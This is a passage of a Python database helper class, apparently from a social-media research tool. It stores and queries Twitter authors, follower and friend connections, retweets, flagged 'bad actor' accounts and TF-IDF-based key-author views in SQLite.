image_hidden_text in image_hidden_texts:\n            if (i % 100 == 0):\n                msg = \"\\r 
Insert image_hidden_text to DB: [{}\".format(i) + \"/\" + str(len(image_hidden_texts)) + ']'\n print(msg, end=\"\")\n i += 1\n self.update_image_hidden_text(image_hidden_text)\n self.commit()\n\n def delete_authors_features(self):\n q = text(\"delete from author_features\")\n self.session.execute(q)\n self.commit()\n\n def delete_from_authors_features_trained_authors(self, author_guids_to_remove):\n self.session.query(AuthorFeatures).filter(AuthorFeatures.author_guid.in_(author_guids_to_remove)).delete(\n synchronize_session='fetch')\n self.session.commit()\n\n ###########################################################\n # key_authors\n ###########################################################\n def get_key_authors(self):\n query = text(\"SELECT author_name FROM export_key_authors\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return [rec[0] for rec in records]\n\n def get_sum_tfidf_scores(self):\n '''\n :return: A map of author_guid->sumtfidf\n '''\n query = text(\"SELECT export_key_authors.author_guid, \"\n \"export_key_authors.SumTFIDF \"\n \"FROM export_key_authors \"\n \"JOIN authors \"\n \"ON export_key_authors.author_guid = authors.author_guid \"\n \"WHERE domain='Microblog'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return {rec[0]: rec[1] for rec in records}\n\n def get_max_tfidf_scores(self):\n '''\n :return: A map author_guid->maxtfidf\n '''\n query = text(\"SELECT export_key_authors.author_guid, \"\n \"export_key_authors.MaxTFIDF \"\n \"FROM export_key_authors \"\n \"JOIN authors \"\n \"ON export_key_authors.author_guid = authors.author_guid \"\n \"WHERE domain='Microblog'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return {rec[0]: rec[1] for rec in records}\n\n def is_export_key_authors_view_exist(self):\n query = text(\"SELECT name FROM sqlite_master WHERE type='view' AND name='export_key_authors'\")\n result = self.session.execute(query)\n cursor = result.cursor\n records = list(cursor.fetchall())\n return len(records) != 0\n\n ###########################################################\n # author_boost_scores\n ###########################################################\n def deleteBoostAuth(self, window_start=None):\n if window_start:\n self.session.query(Post_to_pointers_scores).filter(\n Post_to_pointers_scores.window_start == window_start).delete()\n self.session.query(Author_boost_stats).filter(Author_boost_stats.window_start == window_start).delete()\n\n else:\n self.session.query(Post_to_pointers_scores).delete()\n self.session.query(Author_boost_stats).delete()\n self.session.commit()\n pass\n\n def getPostsListWithoutEmptyRowsByDate(self, window_start, window_end):\n\n q = text(\"select * from posts where content is not NULL and (:window_start <= date and date <= :window_end)\")\n references = []\n res = self.session.execute(q, params=dict(window_start=window_start, window_end=window_end))\n posts = [list(post.values()) for post in res]\n return posts\n\n def getPostsListWithoutEmptyRowsByDomain(self, domain):\n\n q = text(\"select * from posts where content is not NULL and domain = :domain\")\n references = []\n res = self.session.execute(q, params=dict(domain=domain))\n posts = [list(post.values()) for post in res]\n return posts\n\n def getPostsListWithoutEmptyRows(self):\n q = text(\"select * from posts where content is not NULL\")\n references = []\n res = 
self.session.execute(q)\n        posts = [list(post.values()) for post in res]\n        return posts\n\n    def get_author_guid_post_dict(self):\n        author_guid_posts_dict = defaultdict(list)\n        posts = self.get_posts()\n        for post in posts:\n            author_guid_posts_dict[post.author_guid].append(post)\n        return author_guid_posts_dict\n\n    def addAuthor_boost_stats(self, author_boost_stats):\n        self.session.merge(author_boost_stats)\n\n    def addAuthors_boost_stats(self, authors_boost_stats):\n        for author_boost_stats in authors_boost_stats:\n            self.addAuthor_boost_stats(author_boost_stats)\n        self.session.commit()\n\n    def addPost_to_pointers_scores(self, post_to_pointers_scores):\n        self.session.merge(post_to_pointers_scores)\n\n    def addPosts_to_pointers_scores(self, posts_to_pointers_scores):\n        for post_to_pointers_scores in posts_to_pointers_scores:\n            self.addPost_to_pointers_scores(post_to_pointers_scores)\n        self.session.commit()\n\n    def getReferencesFromPost(self, postid):\n        urlToList = []\n        references = self.session.query(Post_citation).filter(Post_citation.post_id_from == postid).all()\n        for ref in references:\n            urlToList.append(ref.url_to)\n        return list(set(urlToList))\n\n    def getAuthor_boost_stats(self, author_guid):\n        result = self.session.query(Author_boost_stats).filter(Author_boost_stats.author_guid == author_guid).all()\n\n        if len(result) > 0:\n            return result[0]\n        return None\n\n    def get_all_authors_boost_stats(self, domain):\n        result = self.session.query(Author_boost_stats).filter(\n            Author_boost_stats.author_domain == str(domain)).all()\n\n        if len(result) > 0:\n            return result\n        return None\n\n    ###########################################################\n    # post_retweeter_connections\n    ###########################################################\n    def get_post_retweeter_connections_by_post_id(self, post_id):\n        return self.session.query(PostRetweeterConnection).filter(PostRetweeterConnection.post_osn_id == post_id).all()\n\n    ###########################################################\n    # authors\n    ###########################################################\n\n    def add_author(self, author):\n        self.session.merge(author)\n\n    def add_authors(self, authors):\n        logging.info(\"-- add_authors --\")\n        logging.info(\"Number of authors is: \" + str(len(authors)))\n        i = 1\n        for author in authors:\n            msg = \"\\r Add author to DB: [{}\".format(i) + \"/\" + str(len(authors)) + ']'\n            print(msg, end=\"\")\n            i += 1\n            self.add_author(author)\n        self.commit()\n        if len(authors) != 0: print(\"\")\n\n    def get_author_by_author_guid(self, author_guid):\n        result = self.session.query(Author).filter(Author.author_guid == author_guid).all()\n        return result[0]\n\n    def get_author_by_screen_name(self, screen_name):\n        result = self.session.query(Author).filter(Author.author_screen_name == screen_name).all()\n        return result[0]\n\n    def get_author_by_author_guid_and_domain(self, author_guid, domain):\n        result = self.session.query(Author).filter(and_(Author.author_guid == author_guid,\n                                                        Author.domain == domain)).all()\n        return result\n\n    def is_author_exists(self, author_guid, domain):\n        author = self.get_author_by_author_guid_and_domain(author_guid, domain)\n        return len(author) > 0\n\n    def get_authors_retrieved_from_xml_importer(self):\n        result = self.session.query(Author).filter(Author.xml_importer_insertion_date.isnot(None)).all()\n        return result\n\n    def get_retweet_count(self):\n        query = text(\"\"\"select author_guid, count(posts.post_id)\n                        from posts\n                        where content like '%RT @%'\n                        group by author_guid\"\"\")\n        result = self.session.execute(query)\n        
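# each fetched row is an (author_guid, retweet_count) pair used to build the mapping\n        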
records = list(result.cursor.fetchall())\n        return {rec[0]: rec[1] for rec in records}\n\n    def get_retweets(self):\n        query = text(\" select post_id, content from posts where content like '%RT @%'\")\n        result = self.session.execute(query)\n        records = list(result.cursor.fetchall())\n        return {rec[0]: rec[1] for rec in records}\n\n    def get_missing_data_twitter_screen_names(self):\n        \"\"\"\n        This function retrieves all the users who have missing information.\n        These users are authors who have no Twitter user id but whose posts carry a Twitter URL.\n        :return: list of screen names\n        \"\"\"\n        query = \"SELECT authors.name \" \\\n                \"FROM authors \" \\\n                \"WHERE authors.author_osn_id is NULL \"\n        # \"AND (authors.is_suspended_or_not_exists is NULL \" \\\n        # \"OR authors.is_suspended_or_not_exists = 0) \" \\\n        # \"AND authors.domain = 'Microblog' \" \\\n        # \"AND authors.author_type IS NULL \" \\\n        # \"GROUP BY authors.name\" #TODO: Domains.MICROBLOG\n        # \"LIMIT 35;\"\n\n        query = text(query)\n        result = self.session.execute(query)\n        cursor = result.cursor\n        screen_names = list(cursor.fetchall())\n        twitter_screen_names = [r[0] for r in screen_names]\n        return twitter_screen_names\n\n    def get_missing_data_twitter_screen_names_by_posts(self):\n        query = \"SELECT DISTINCT(posts.author) \" \\\n                \"FROM posts WHERE LOWER(posts.author) NOT IN \" \\\n                \"(SELECT LOWER(author_screen_name) FROM authors WHERE author_osn_id IS NOT NULL)\"\n\n        query = text(query)\n        result = self.session.execute(query)\n        cursor = result.cursor\n        screen_names = list(cursor.fetchall())\n        twitter_screen_names = [r[0] for r in screen_names]\n        return twitter_screen_names\n\n    def get_missing_data_twitter_screen_names_by_authors(self):\n        query = \"SELECT DISTINCT(author_screen_name) \" \\\n                \"FROM authors WHERE author_osn_id IS NULL\"\n\n        query = text(query)\n        result = self.session.execute(query)\n        cursor = result.cursor\n        screen_names = list(cursor.fetchall())\n        twitter_screen_names = [r[0] for r in screen_names]\n        return twitter_screen_names\n\n    def get_authors_for_mark_as_suspended_or_not_existed(self):\n        # This function retrieves all the users who are suspended or no longer exist.\n        # Run this query only after all followers have been retrieved;\n        # once they are saved we can be sure Twitter omitted the rest because of their status (suspended).\n        query = \"SELECT * \" \\\n                \"FROM authors \" \\\n                \"INNER JOIN posts on (authors.author_guid = posts.author_guid) \" \\\n                \"WHERE authors.author_osn_id is NULL \" \\\n                \"AND authors.name = posts.author \" \\\n                \"AND (posts.url LIKE \\'%http://twitter.com%\\' \" \\\n                \"OR posts.url LIKE \\'%https://twitter.com%\\')\"\n\n        query = text(query)\n        result = self.session.execute(query)\n        cursor = result.cursor\n        suspended_authors = list(cursor.fetchall())\n        return suspended_authors\n\n    def get_not_suspended_authors(self, domain):\n        result = self.session.query(Author).filter(\n            and_(Author.is_suspended_or_not_exists == None, Author.domain == domain)).all()\n        return result\n\n    def get_followers_brought_by_terms(self):\n        # query = \"\"\"\n        # SELECT DISTINCT(authors.author_osn_id)\n        # FROM author_connections\n        # INNER JOIN authors ON (authors.author_guid = author_connections.destination_author_guid)\n        # WHERE author_connections.connection_type = 'term-author'\n        # AND authors.author_osn_id NOT IN (\n        #     SELECT DISTINCT(temp_author_connections.source_author_osn_id)\n        #     FROM temp_author_connections\n        #     WHERE temp_author_connections.connection_type = 'follower'\n        # )\n        # \"\"\"\n        # AND 
authors.author_osn_id IS NOT '18691328'\n query = \"\"\"\n SELECT DISTINCT(authors.author_osn_id)\n FROM author_connections\n INNER JOIN authors ON (authors.author_guid = author_connections.destination_author_guid)\n WHERE author_connections.connection_type = 'term-author'\n\n AND authors.author_osn_id NOT IN (\n SELECT DISTINCT(temp_author_connections.source_author_osn_id)\n FROM temp_author_connections\n WHERE temp_author_connections.connection_type = 'follower'\n )\n \"\"\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n tuples = cursor.fetchall()\n author_osn_ids = [tuple[0] for tuple in tuples]\n return author_osn_ids\n\n def get_followers_or_friends_candidats(self, connection_type, domain, limit):\n # This function retrieves all the user ids we would like to extract their followers.\n # These users are authors who are not the source in the connections table and not in follower type.\n # Moreover, bring me the authors who are not protected, and they are from twitter (type = microblog)\n\n # query = \"\"\"\n # SELECT *\n # FROM (SELECT authors.author_guid\n # FROM authors\n # WHERE authors.author_guid NOT IN(\n # SELECT source_author_guid\n # FROM author_connections\n # WHERE connection_type = :connection_type)\n # AND authors.protected = 0\n # AND authors.author_type is NULL\n # AND authors.domain = :domain\n # AND authors.xml_importer_insertion_date IS NOT NULL\n # AND authors.followers_count > 10\n # LIMIT 5)\n # \tUnion\n # SELECT author_guid\n # FROM (\n # SELECT authors.author_guid, authors.followers_count, authors.statuses_count\n # FROM authors\n # WHERE authors.author_type = 'bad_actor'\n # AND authors.statuses_count > 10\n # AND authors.followers_count > 10\n # AND authors.protected = 0\n # AND authors.author_guid NOT IN (\n # SELECT author_connections.source_author_guid\n # FROM author_connections\n # WHERE author_connections.connection_type = :connection_type)\n # ORDER BY authors.followers_count DESC, authors.statuses_count DESC\n # LIMIT 0)\n # \"\"\"\n\n query = \"\"\"\n SELECT authors.author_osn_id\n FROM authors\n WHERE authors.author_guid NOT IN(\n SELECT source_author_guid\n FROM author_connections\n WHERE connection_type = :connection_type)\n AND authors.protected = 0\n AND authors.domain = :domain\n AND {0} > 10\n LIMIT :limit\n \"\"\"\n if (connection_type == Author_Connection_Type.FOLLOWER):\n query = query.format('authors.followers_count')\n elif (connection_type == Author_Connection_Type.FRIEND):\n query = query.format('authors.friends_count')\n else:\n query = query.format('11')\n query = text(query)\n result = self.session.execute(query, params=dict(connection_type=connection_type, domain=domain, limit=limit))\n cursor = result.cursor\n return cursor\n\n def get_twitter_author_ids_for_extracting_friends(self):\n # This function retrieves all the user ids we would like to extract their followers.\n # These users are authors who are not the source in the connections table and not in follower type.\n # Moreover, bring me the authors who are not protected, and they are from twitter (type = microblog)\n '''\n query = \"SELECT authors.author_osn_id \" \\\n \"FROM authors \" \\\n \"WHERE authors.author_osn_id NOT IN \" \\\n \"(SELECT authors.author_osn_id \" \\\n \"FROM authors \" \\\n \"INNER JOIN author_connections ON \" \\\n \"(authors.author_osn_id = author_connections.source_author_osn_id) \" \\\n \"WHERE author_connections.connection_type = 'friend') \" \\\n \"AND authors.protected = 0 \" \\\n \"AND authors.domain = 
'Microblog' \" \\\n \"AND authors.xml_importer_insertion_date IS NOT NULL \" \\\n \"AND authors.missing_data_complementor_insertion_date IS NOT NULL \" \\\n \"AND authors.friends_count > 0 \" \\\n #\"LIMIT 20;\"\n '''\n query = \"SELECT * \" \\\n \"FROM (\" \\\n \"SELECT authors.author_osn_id \" \\\n \"FROM authors \" \\\n \"WHERE authors.author_osn_id NOT IN(\" \\\n \"SELECT author_connections.source_author_osn_id \" \\\n \"FROM author_connections \" \\\n \"WHERE author_connections.connection_type = 'friend') \" \\\n \"AND authors.protected = 0 \" \\\n \"AND authors.author_type is NULL \" \\\n \"AND authors.domain = 'Microblog' \" \\\n \"AND authors.xml_importer_insertion_date IS NOT NULL \" \\\n \"AND authors.friends_count > 10 \" \\\n \"LIMIT 35) \" \\\n \"Union \" \\\n \"SELECT author_osn_id \" \\\n \"FROM (\" \\\n \"SELECT authors.author_osn_id, authors.friends_count, authors.statuses_count \" \\\n \"FROM authors \" \\\n \"WHERE authors.author_type = 'bad_actor' \" \\\n \"AND authors.statuses_count > 10 \" \\\n \"AND authors.friends_count > 10 \" \\\n \"AND authors.protected = 0 \" \\\n \"AND authors.author_osn_id NOT IN (\" \\\n \"SELECT author_connections.source_author_osn_id \" \\\n \"FROM author_connections \" \\\n \"WHERE author_connections.connection_type = 'friend') \" \\\n \"ORDER BY authors.friends_count DESC, authors.statuses_count DESC \" \\\n \"LIMIT 35)\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n ids = list(cursor.fetchall())\n twitter_ids = [r[0] for r in ids]\n return twitter_ids\n\n def get_screen_names_for_twitter_authors_by_posts(self):\n screen_names = []\n http_twitter_prefix = str('%http://twitter.com%')\n https_twitter_prefix = str('%https://twitter.com%')\n results = self.session.query(Post.url).filter(and_(Post.xml_importer_insertion_date is not None,\n Post.author == Author.name,\n Author.missing_data_complementor_insertion_date is None,\n or_(Post.url.like(http_twitter_prefix),\n Post.url.like(https_twitter_prefix)))).all()\n\n expression_one = r\"(?<=http:\\/\\/twitter\\.com\\/)\\w+(?=\\/statuses\\/\\d+)\"\n expression_two = r\"(?<=https:\\/\\/twitter\\.com\\/)\\w+(?=\\/statuses\\/\\d+)\"\n r_one = re.compile(expression_one, re.VERBOSE)\n r_two = re.compile(expression_two, re.VERBOSE)\n for result in results:\n twitter_url = result[0]\n optional_screen_names = r_one.findall(twitter_url)\n if optional_screen_names:\n screen_name = optional_screen_names[0]\n screen_names.append(screen_name)\n else:\n optional_screen_names = r_two.findall(twitter_url)\n if optional_screen_names:\n screen_name = optional_screen_names[0]\n screen_names.append(screen_name)\n return screen_names\n\n def get_twitter_authors_retrieved_from_vico_importer(self):\n '''\n query = text(\"SELECT * FROM authors JOIN posts on posts.author = authors.name WHERE posts.xml_importer_insertion_date IS NOT NULL AND authors.bad_actors_markup_insertion_date is NULL AND (posts.url LIKE '%http://twitter.com%' OR posts.url LIKE '%https://twitter.com%');\")\n result = self.session.execute(query)\n authors = [author.values() for author in result]\n return authors\n '''\n\n result = self.session.query(Author).filter(and_(Post.xml_importer_insertion_date is not None),\n (Post.author == Author.name),\n (Author.missing_data_complementor_insertion_date is None),\n or_(Post.url.like('%http://twitter.com%'),\n Post.url.like('%https://twitter.com%'))).all()\n return result\n\n def add_author_connection(self, author_connection):\n 
self.session.merge(author_connection)\n\n    def add_post_retweeter_connection(self, post_retweeter_connection):\n        self.session.merge(post_retweeter_connection)\n\n    def add_author_connections(self, author_connections):\n        total = len(author_connections)\n        current = 0\n        for author_connection in author_connections:\n            current += 1\n            msg = '\\r adding ' + str(current) + ' of ' + str(total) + ' author_connections'\n            print(msg, end=\"\")\n            self.add_author_connection(author_connection)\n        self.session.commit()\n\n    def get_author_connections_dict(self):\n        authors_connections = self.session.query(AuthorConnection).all()\n        authors_connections_dict = defaultdict(list)\n        for authors_connection in authors_connections:\n            authors_connections_dict[authors_connection.connection_type].append(authors_connection)\n        return authors_connections_dict\n\n    def get_author_connections_by_author_guid(self, source_author_guid):\n        return self.session.query(AuthorConnection).filter(\n            AuthorConnection.source_author_guid == source_author_guid).all()\n\n    def add_post_retweeter_connections(self, post_retweeter_connections):\n        for post_retweeter_connection in post_retweeter_connections:\n            self.add_post_retweeter_connection(post_retweeter_connection)\n        self.session.commit()\n\n    def get_vico_importer_bad_actors(self):\n        vico_importer_bad_actors = self.session.query(Author).filter(and_(Author.author_type == Author_Type.BAD_ACTOR,\n                                                                          or_(Author.xml_importer_insertion_date.isnot(None),\n                                                                              Author.vico_dump_insertion_date.isnot(None)))).all()\n        number_of_vico_importer_bad_actors = len(vico_importer_bad_actors)\n        logging.info(\"Number of bad_actors found by VICO is: \" + str(number_of_vico_importer_bad_actors))\n        return vico_importer_bad_actors\n\n    def get_bad_actor_ids(self):\n        logging.info(\"get_bad_actor_ids\")\n\n        query = \"SELECT authors.author_osn_id \" \\\n                \"FROM authors \" \\\n                \"WHERE authors.author_type = 'bad_actor'\"\n\n        query = text(query)\n        result = self.session.execute(query)\n        cursor = result.cursor\n        ids = list(cursor.fetchall())\n        twitter_authors_ids = [r[0] for r in ids]\n        logging.info(\"Number of bad actor ids is: \" + str(len(twitter_authors_ids)))\n        return twitter_authors_ids\n\n    def get_vico_importer_potential_good_actors(self):\n        vico_importer_potential_good_actors = self.session.query(Author).filter(and_(Author.author_type.is_(None),\n                                                                                     Author.missing_data_complementor_insertion_date.isnot(None),\n                                                                                     Author.xml_importer_insertion_date.isnot(None))).all()\n        number_of_vico_importer_potential_good_actors = len(vico_importer_potential_good_actors)\n        logging.info(\n            \"Number of vico_importer_potential_good_actors is: \" + str(number_of_vico_importer_potential_good_actors))\n        return vico_importer_potential_good_actors\n\n    def convert_twitter_users_to_authors(self, users, targeted_social_network, author_type, inseration_type):\n        authors = []\n        seen_authors = set()\n        logging.info(\"Convert twitter users to authors: \" + str(len(users)))\n        i = 1\n        for user in users:\n            author = self.convert_twitter_user_to_author(user, targeted_social_network, author_type, inseration_type)\n            if author.author_guid not in seen_authors:\n                authors.append(author)\n                seen_authors.add(author.author_guid)\n            msg = \"\\r Author record was converted: {0} 
[{1}/{2}]\".format(author.author_screen_name, i, str(len(users)))\n print(msg, end=\"\")\n # print(\"Author record was converted: \" + author.author_screen_name)\n i += 1\n # logging.info(\"Author record was converted: \" + author.author_screen_name)\n return authors\n\n def convert_twitter_user_to_author(self, osn_user, targeted_social_network, author_type, inseration_type):\n author_screen_name = str(osn_user.screen_name)\n author_guid = compute_author_guid_by_author_name(author_screen_name)\n\n domain = Domains.MICROBLOG\n # result = self.get_author_by_author_guid(author_guid)\n # if len(result) == 0:\n author = Author()\n # else:\n # author = result[0]\n\n author.author_screen_name = str(author_screen_name)\n author.name = author_screen_name # .lower()\n author.domain = str(targeted_social_network)\n\n author.author_guid = str(author_guid)\n\n author.author_full_name = str(osn_user.name)\n author.author_osn_id = str(osn_user.id)\n author.description = str(osn_user.description)\n author.created_at = str(osn_user.created_at)\n author.statuses_count = osn_user.statuses_count\n author.followers_count = osn_user.followers_count\n author.friends_count = osn_user.friends_count\n author.favourites_count = osn_user.favourites_count\n author.listed_count = osn_user.listed_count\n author.language = str(osn_user.lang)\n author.profile_background_color = osn_user.profile_background_color\n author.profile_background_tile = osn_user.profile_background_tile\n author.profile_banner_url = osn_user.profile_banner_url\n author.profile_image_url = osn_user.profile_image_url\n author.profile_link_color = osn_user.profile_link_color\n author.profile_sidebar_fill_color = osn_user.profile_sidebar_fill_color\n author.profile_text_color = osn_user.profile_text_color\n author.default_profile = osn_user.default_profile\n author.contributors_enabled = osn_user.contributors_enabled\n author.default_profile_image = osn_user.default_profile_image\n author.geo_enabled = osn_user.geo_enabled\n author.protected = osn_user.protected\n author.location = str(osn_user.location)\n author.notifications = osn_user.notifications\n author.time_zone = str(osn_user.time_zone)\n author.url = str(osn_user.url)\n author.utc_offset = osn_user.utc_offset\n author.verified = osn_user.verified\n author.is_suspended_or_not_exists = None\n\n if author_type is Author_Type.BAD_ACTOR:\n author.author_type = author_type\n self.set_inseration_date(author, inseration_type)\n\n return author\n\n # set date to authors\n def set_inseration_date(self, author, inseration_type):\n # now = unicode(get_current_time_as_string())\n now = self._date\n if inseration_type == DB_Insertion_Type.BAD_ACTORS_COLLECTOR:\n author.bad_actors_collector_insertion_date = now\n elif inseration_type == DB_Insertion_Type.XML_IMPORTER:\n author.xml_importer_insertion_date = now\n elif inseration_type == DB_Insertion_Type.MISSING_DATA_COMPLEMENTOR:\n author.missing_data_complementor_insertion_date = now\n elif inseration_type == DB_Insertion_Type.BAD_ACTORS_MARKUP:\n author.bad_actors_markup_insertion_date = now\n elif inseration_type == DB_Insertion_Type.MARK_MISSING_BAD_ACTOR_RETWEETERS:\n author.mark_missing_bad_actor_retweeters_insertion_date = now\n\n def create_author_connections(self, source_id, destination_author_ids, weight, author_connection_type,\n insertion_date):\n print(\"---create_author_connections---\")\n author_connections = []\n for destination_author_id in destination_author_ids:\n author_connection = self.create_author_connection(source_id, 
destination_author_id, weight,\n author_connection_type, insertion_date)\n author_connections.append(author_connection)\n\n return author_connections\n\n def create_author_connection(self, source_author_guid, destination_author_guid, weight, connection_type,\n insertion_date):\n # print(\"---create_author_connection---\")\n author_connection = AuthorConnection()\n\n # msg = '\\r Author connection: source -> ' + str(source_author_guid) + ', dest -> ' + str(\n # destination_author_guid) + ', connection type = ' + connection_type\n # print(msg, end=\"\")\n\n # print(\"Author connection: source -> \" + str(source_author_guid) + \", dest -> \" + str(destination_author_guid) + \", connection type = \" + connection_type)\n author_connection.source_author_guid = source_author_guid\n author_connection.destination_author_guid = destination_author_guid\n author_connection.connection_type = str(connection_type)\n author_connection.weight = str(weight)\n author_connection.insertion_date = insertion_date\n\n return author_connection\n\n def save_author_connections(self, author_connections):\n print(\"---Saving author connections in DB---\")\n save_author_connections_start_time = time.time()\n # self.add_author_connections(author_connections)\n self.add_author_connections_fast(author_connections)\n save_author_connections_end_time = time.time()\n save_author_connections_time = save_author_connections_end_time - save_author_connections_start_time\n print(\"Saving author connections in DB took in seconds: \" + str(save_author_connections_time))\n\n def create_and_save_author_connections(self, source_author_id, follower_ids, weight, connection_type):\n author_connections = self.create_author_connections(source_author_id, follower_ids, weight, connection_type,\n self._window_start)\n self.save_author_connections(author_connections)\n\n def get_author_connections_by_type(self, connection_type):\n # print(\"get_author_connections_by_type: \" + str(connection_type))\n query = self.session.query(AuthorConnection).filter(AuthorConnection.connection_type == connection_type)\n res = self.session.execute(query)\n cursor = res.cursor\n return cursor\n\n def result_iter(self, cursor, arraysize=1000):\n 'An iterator that uses fetchmany to keep memory usage down'\n while True:\n results = cursor.fetchmany(arraysize)\n if not results:\n break\n for result in results:\n yield result\n\n def get_post_min_date(self):\n query = \"SELECT MIN(posts.date) \" \\\n \"FROM posts\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n fetched_curser = cursor.fetchall()\n str_date_object = fetched_curser[0]\n str_date = str_date_object[0]\n returned_date = self.create_date_from_full_string_date(str_date)\n return returned_date\n\n def get_post_max_date(self):\n query = \"SELECT MAX(posts.date) \" \\\n \"FROM posts\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n fetched_curser = cursor.fetchall()\n str_date_object = fetched_curser[0]\n str_date = str_date_object[0]\n returned_date = self.create_date_from_full_string_date(str_date)\n return returned_date\n\n def create_date_from_full_string_date(self, str_date):\n date_and_hour = str_date.split(\" \")\n str_selected_date = date_and_hour[0]\n year_month_day = str_selected_date.split(\"-\")\n year = int(year_month_day[0])\n month = int(year_month_day[1])\n day = int(year_month_day[2])\n from datetime import date, timedelta as td\n created_date = date(year, month, day)\n return created_date\n\n def 
get_new_author_screen_names_by_date(self, min_date, current_date):\n\n yesterday = current_date - timedelta(days=1)\n query = \"SELECT DISTINCT posts.author \" \\\n \"FROM posts \" \\\n \"WHERE (posts.url LIKE '%http://twitter.com%' \" \\\n \"OR posts.url LIKE '%https://twitter.com%') \" \\\n \"AND posts.domain = 'Microblog' \" \\\n \"AND posts.date > \" + \"'\" + str(current_date) + \" 00:00:00' \" \\\n \"AND posts.date <= \" + \"'\" + str(\n current_date) + \" 23:59:59' \" \\\n \"and posts.author not in ( \" \\\n \"SELECT DISTINCT posts.author \" \\\n \"FROM posts \" \\\n \"WHERE (posts.url LIKE '%http://twitter.com%' \" \\\n \"OR posts.url LIKE '%https://twitter.com%') \" \\\n \"AND posts.domain = 'Microblog' \" \\\n \"AND posts.date > \" + \"'\" + (\n str(yesterday) if current_date == min_date else str(min_date)) + \" 00:00:00' \" \\\n \"AND posts.date <= \" + \"'\" + str(\n yesterday) + \" 23:59:59' \" \\\n \"GROUP BY author)\"\n\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n authors = list(cursor.fetchall())\n author_screen_names = [r[0] for r in authors]\n return author_screen_names\n\n ###########################################################\n # Views creation\n ###########################################################\n def create_uf_view(self):\n '''\n Represents the #references to a post from a given topic\n '''\n self.session.execute(\"DROP VIEW IF EXISTS uf;\")\n self.session.execute(\"\\\n CREATE VIEW IF NOT EXISTS uf AS\\\n SELECT p.post_id_to AS post_id, \\\n p.url_to,\\\n t.max_topic_id AS topic_id,\\\n count(p.post_id_from) AS url_frequency \\\n FROM post_citations p \\\n INNER JOIN \\\n post_topic_mapping t ON (p.post_id_from = t.post_id) \\\n GROUP BY p.post_id_to, \\\n t.max_topic_id\\\n ;\")\n self.session.commit()\n\n def create_tf_view(self):\n '''\n Represents the #topics pointing to a post\n '''\n self.session.execute(\"DROP VIEW IF EXISTS tf;\")\n self.session.execute(\"\\\n CREATE VIEW IF NOT EXISTS tf AS\\\n SELECT uf.post_id,\\\n count(uf.topic_id) AS topic_frequency \\\n FROM uf\\\n GROUP BY uf.post_id\\\n ;\")\n self.session.commit()\n\n def create_total_url_frequency_view(self):\n '''\n Represents #references to a post overall\n '''\n self.session.execute(\"DROP VIEW IF EXISTS total_url_frequency;\")\n self.session.execute(\"\\\n CREATE VIEW IF NOT EXISTS total_url_frequency AS\\\n SELECT uf.post_id,\\\n sum(uf.url_frequency) AS tof\\\n FROM uf \\\n GROUP BY uf.post_id;\\\n \")\n self.session.commit()\n\n def create_topic_stats_view(self):\n '''\n Represents how many references is available from each topic\n '''\n self.session.execute(\"DROP VIEW IF EXISTS topic_stats;\")\n self.session.execute(\"\\\n CREATE VIEW IF NOT EXISTS topic_stats as \\\n SELECT max_topic_id AS topic_id, count(post_id) as post_count \\\n FROM post_topic_mapping \\\n GROUP BY max_topic_id \\\n \")\n self.session.commit()\n\n def create_tfidf_view(self):\n self.session.execute(\"DROP VIEW IF EXISTS tfidf;\")\n self.session.execute(\"\\\n CREATE VIEW IF NOT EXISTS tfidf AS \\\n SELECT uf.post_id,\\\n uf.topic_id,\\\n uf.url_to,\\\n uf.url_frequency AS how_many_times_cited_in_topic,\\\n tf.topic_frequency AS in_how_many_topics,\\\n topic_stats.post_count,\\\n 1.0 * uf.url_frequency / topic_stats.post_count * log(1.0 * (select count(*) from topics) / tf.topic_frequency) AS ufitf1,\\\n tuf.tof\\\n FROM uf\\\n INNER JOIN\\\n tf ON (uf.post_id = tf.post_id) \\\n INNER JOIN \\\n topic_stats ON (uf.topic_id = topic_stats.topic_id) \\\n INNER 
JOIN\\\n total_url_frequency tuf ON (tuf.post_id = uf.post_id);\\\n \")\n self.session.commit()\n\n def create_key_posts_view(self):\n self.session.execute(\"DROP VIEW IF EXISTS export_key_posts;\")\n self.session.execute(\"\\\n CREATE VIEW IF NOT EXISTS export_key_posts AS \\\n SELECT p.post_id, \\\n p.guid,\\\n p.url as url, \\\n max(pr.tfidf) AS tfidf1 \\\n FROM posts p \\\n INNER JOIN posts_representativeness pr on (pr.post_id = p.post_id)\\\n GROUP BY p.post_id,\\\n p.guid, \\\n p.url;\")\n\n def create_key_authors_view(self):\n self.session.execute(\"DROP VIEW IF EXISTS export_key_authors;\")\n self.session.execute(\"CREATE VIEW IF NOT EXISTS export_key_authors AS \\\n SELECT p.author AS author_name,\\\n p.author_guid,\\\n SUM(r.tfidf1) AS SumTFIDF,\\\n MAX(r.tfidf1) AS MaxTFIDF\\\n FROM posts p \\\n JOIN \\\n export_key_posts r ON (r.post_id = p.post_id)\\\n where author_guid is not null and r.tfidf1 is not null\\\n GROUP BY p.author_guid\")\n\n def create_author_post_cite_view(self):\n self.session.execute(\"DROP VIEW IF EXISTS author_post_cite;\")\n query = text(\"CREATE VIEW IF NOT EXISTS author_post_cite as \\\n SELECT DISTINCT posts.author_guid, post_citations.post_id_to \\\n FROM posts \\\n\t INNER JOIN post_citations ON(post_citations.post_id_from = posts.post_id) \\\n\t WHERE posts.author_guid is not null\")\n self.session.execute(query)\n self.session.commit()\n\n def get_authors_topics(self, domain, min_posts_count):\n query = \"\"\"\n SELECT author_topic_mapping.*\n FROM author_topic_mapping\n INNER JOIN author_guid_num_of_posts_view ON (author_guid_num_of_posts_view.author_guid = author_topic_mapping.author_guid)\n WHERE author_guid_num_of_posts_view.num_of_posts >= :min_posts_count\n AND domain = :domain\n \"\"\"\n result = self.session.execute(query, params=dict(domain=domain, min_posts_count=min_posts_count))\n cursor = result.cursor\n author_topics_vectors = self.result_iter(cursor)\n\n author_guid_topics_vector = self._create_author_guid_topics_vector(author_topics_vectors)\n return author_guid_topics_vector\n\n def get_random_authors_topics(self, domain, min_posts_count):\n query = \"\"\"\n SELECT author_topic_mapping.*\n FROM author_topic_mapping\n INNER JOIN 